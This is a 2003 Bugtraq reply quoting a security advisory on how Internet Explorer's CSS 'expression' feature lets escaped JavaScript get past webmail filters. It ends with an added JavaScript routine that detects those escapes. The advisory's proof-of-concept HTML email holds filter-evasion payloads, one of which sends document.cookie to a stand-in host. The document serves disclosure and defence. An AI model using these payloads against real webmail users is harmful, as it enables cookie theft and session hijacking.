RE: Webmails + Internet Explorer can create unwanted javascript execution

From: Drew Copley (dcopley_at_eeye.com)
Date: 10/03/03

  • Next message: Conectiva Updates: "[CLA-2003:757] Conectiva Security Announcement - vixie-cron"
    To: "'Jedi/Sector One'" <j@pureftpd.org>, <bugtraq@securityfocus.com>
    Date: Fri, 3 Oct 2003 10:19:23 -0700
    
    

    Yahoo has a massive userbase (with good reason).

    This kind of bug could potentially turn some IE security issues into a more
    readily mail-borne attack. This could be bad. Very bad.

    I do not see that you have contacted Yahoo on this.

    > -----Original Message-----
    > From: Jedi/Sector One [mailto:j@pureftpd.org]
    > Sent: Thursday, October 02, 2003 2:39 PM
    > To: bugtraq@securityfocus.com
    > Subject: Webmails + Internet Explorer can create unwanted
    > javascript execution
    >
    >
    >
    >
    > Summary : Multiple web-based mail systems browsed through
    > Internet Explorer
    > can allow arbitrary javascript execution.
    > Date : 02/10/2003
    > Author : Frank Denis <j@pureftpd.org>
    >
    >
    > ------------------------[ Description ]------------------------
    >
    > The issue described here doesn't reveal a vulnerability in
    > a specific product. But the combination of features of
    > Internet Explorer with features of common webmail software
    > can create a vulnerability.
    >
    > 1) Internet Explorer interprets stylesheets for any HTML tag,
    > even non-existent ones. For instance :
    >
    > <xbody style="...">
    >
    > is not a valid tag, but attributes are evaluated.
    >
    > It may be considered as a bug or as a logical behavior,
    > your mileage may vary. And this alone is not a security flaw.
    >
    > 2) Internet Explorer can evaluate Javascript expressions in
    > style sheets through the "expression" keyword :
    >
    > <style type="text/css">
    > a {
    > width: expression(6 * 9 + 'px');
    > }
    > </style>
    >
    > This is not a bug either, but a proprietary, properly
    > documented extension.
    >
    > 3) Due to the increase of HTML-only email, most popular
    > webmail software can display HTML email. In this context,
    > Javascript _must_ be removed from every email. To achieve
    > this result, various tricks are used by webmail software :
    >
    > - Removal or mangling of <script> tags,
    >
    > - Removal or mangling of "javascript:" urls.
    >
    > - Removal or mangling of properties like "onmouseover".
    >
    >
    > ------------------------[ Vulnerability ]------------------------
    >
    > By combining 2) with 3), if the webmail doesn't filter
    > out stylesheets or the "expression" keyword, any Javascript
    > contained in a message will be executed as soon as the
    > recipient displays it.
    >
    > Some webmail software has been aware of that issue for a while
    > and mangles or filters any occurrence of
    > "expression". However, the mangling may not work when the
    > name of the property is escaped (like "e\xpression") as CSS
    > permits. Or it may not work in the context of
    > non-existent-because-mangled tags. The former worked on
    > Yahoo! until yesterday (the issue was fixed quickly after
    > being reported; they are nice and reactive guys).
    >
    > But most software simply doesn't know about "expression".
    > It is _not_ faulty, though. This is neither a bug nor a
    > vulnerability. "expression" is a proprietary extension.
    > Webmails don't have to know about every possible implication
    > of every proprietary extension of every version of every
    > browser out there.
    >
    > However, when the following conditions are met, the
    > Javascript is executed :
    >
    > - "expression" keywords aren't filtered/mangled by the
    > webmail software.
    >
    > - The client software is Internet Explorer.
    >
    > - Javascript isn't disabled in the client software.
    > Unfortunately, a lot of public webmail systems simply don't
    > work when Javascript is disabled.
    >
    >
    > ------------------------[ Impact ]------------------------
    >
    > Depending on the webmail software, complete control of the
    > client's session may be possible. Private mail can be deleted
    > or bounced to evil addresses, cookies and session identifiers
    > can be stolen, etc.
    >
    >
    > ------------------------[ Proof of concept ]------------------------
    >
    > Webmail software likes to filter or mangle stylesheets. Some
    > software totally removes everything inside <head>...</head>
    > tags. Some software totally removes <body>...</body> tags
    > (possibly killing style info by the way) instead of
    > converting them to something like <div>...</div>. Some
    > software totally removes <style>...</style> definitions but
    > accepts inline CSS.
    > This is bad, because it encourages people to send broken
    > HTML 3 code instead of well-formed, accessible XHTML documents.
    > The following HTML email tries to work around this kind of
    > filter in order to test whether the "expression" keyword
    > gets properly evaluated on Internet Explorer. It
    > currently works at least with IE 6 + Squirrelmail, Yahoo! and
    > the software of a dozen public and ISP webmail services I
    > have an account on.
    >
    > <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
    >   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
    > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
    > <head>
    > <title>Webmail test</title>
    > <meta http-equiv="Content-Type"
    >   content="text/html;charset=ISO-8859-1" />
    > </head>
    > <body style="width:&#x65;xpres\sion(alert(1))">
    > <style type="text/css">
    > h1 {
    >   he\ight:&#x65;\xpression(alert(2));
    >   bac\kground-image:&#x65;\xpression('url(http://example.org/'+document.cookie+$
    > }
    > </style>
    > <h1 style="width:&#x65;xpression(alert(3))">...</h1>
    > <div id="just-for-fun">
    > <a href="&#x6A;avascript:window.open(document.location);"
    >    onmouseover="alert(4)">fireworks</a>
    > </div>
    > </body>
    > </html>
    >
    >
    > ------------------------[ Fix ]------------------------
    >
    > For the end user, there are four ways to avoid this issue :
    >
    > - Don't use Internet Explorer to connect to webmails.
    > or/and
    > - Disable Javascript.
    > or/and
    > - Configure the webmail to only display mails as plain text.
    > or/and
    > - Only connect to webmails when you are 100% sure the
    > software it is powered by completely filters or mangles
    > "expression" keywords, and hope that the software and the version
    > won't change silently.
    >
    >
    > --
    > Frank DENIS (Jedi/Sector One) <j@42-Networks.Com>
    > Secure FTP Server: http://www.PureFTPd.Org/
    > Misc. free software: http://www.Jedi.Claranet.Fr/
    >
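The bypass the quoted advisory describes, as an added example that is not part of the advisory or of the reply above: a filter that looks for the literal string "expression" misses the escaped spellings from the proof of concept, because Internet Explorer decodes HTML character references (in attribute values) and CSS backslash escapes before it reads the property value. The normaliser below decodes the same two layers before matching, which is the check a webmail filter would need. All function names are this example's own, and the samples are constructed from the advisory's proof of concept.

```javascript
// Added example (not from the advisory): a naive "expression" filter, the
// escapes that get past it, and a normalising check that does not.

// Naive mangling of the kind the advisory says some webmails applied:
// only the literal, unescaped keyword is touched.
function naiveMangle(html) {
  return html.replace(/expression/gi, "x-expression");
}

// Out-of-range or zero code points become U+FFFD rather than throwing.
function codePointOr(cp) {
  return cp === 0 || cp > 0x10ffff ? "\uFFFD" : String.fromCodePoint(cp);
}

// Decode numeric character references (&#x65; &#101;) and the few named
// ones that matter in attribute values. Anything else is left alone.
const NAMED_REFS = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'" };
function decodeHtmlRefs(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (hex !== undefined) return codePointOr(parseInt(hex, 16));
    if (dec !== undefined) return codePointOr(parseInt(dec, 10));
    const named = NAMED_REFS[name.toLowerCase()];
    return named !== undefined ? named : m;
  });
}

// Decode CSS backslash escapes (CSS 2.1, section 4.1.3): "\" followed by one
// to six hex digits and an optional single whitespace character is a code
// point; "\" followed by any other character (except a newline) is that
// character itself, so "e\xpression" and "expres\sion" both read "expression".
function decodeCssEscapes(s) {
  return s.replace(/\\([0-9a-f]{1,6})[ \t\r\n\f]?|\\([^\r\n\f])/gi, (m, hex, ch) =>
    hex !== undefined ? codePointOr(parseInt(hex, 16)) : ch
  );
}

// Would IE see an expression() call in this style text? Normalise the way
// the browser does, then strip CSS comments as well (an extra precaution
// that only makes the check stricter) and look for the function token.
// The preceding-character test keeps "x-expression(" from matching, since
// that is a different (unknown) function name to a CSS parser.
function containsExpression(css) {
  const normalised = decodeCssEscapes(decodeHtmlRefs(css)).replace(/\/\*[\s\S]*?\*\//g, "");
  return /(?:^|[^\w-])expression\s*\(/i.test(normalised);
}

// True when the naive filter actually neutralises the sample, i.e. when the
// normalised result no longer carries an expression() call.
function naiveFilterBlocks(sample) {
  return !containsExpression(naiveMangle(sample));
}

// Hardened handling: drop the whole style text instead of mangling it, so
// that no decoding trick can bring the keyword back.
function sanitizeStyle(css) {
  return containsExpression(css) ? "" : css;
}

// Constructed samples taken from the advisory's proof of concept, plus one
// using a hex escape with its trailing space and one harmless declaration.
const SAMPLES = [
  "width:expression(alert(1))",
  "width:&#x65;xpres\\sion(alert(1))",
  "he\\ight:&#x65;\\xpression(alert(2))",
  "width:expr\\65 ssion(alert(3))",
  "color:red; background-image:url(x.png)",
];

// Per-sample comparison of the naive filter against the normalising check.
function report() {
  return SAMPLES.map((s) => ({
    sample: s,
    naiveFilterBlocks: naiveFilterBlocks(s),
    detected: containsExpression(s),
  }));
}

for (const r of report()) console.log(r);
```

Only the first, unescaped sample is stopped by the literal mangle; the three escaped forms pass through it untouched and still normalise to an `expression(` call. Decoding character references inside `<style>` content as well as in attributes errs on the strict side: a filter that decodes more than the browser does can only over-match, which is the safe direction here.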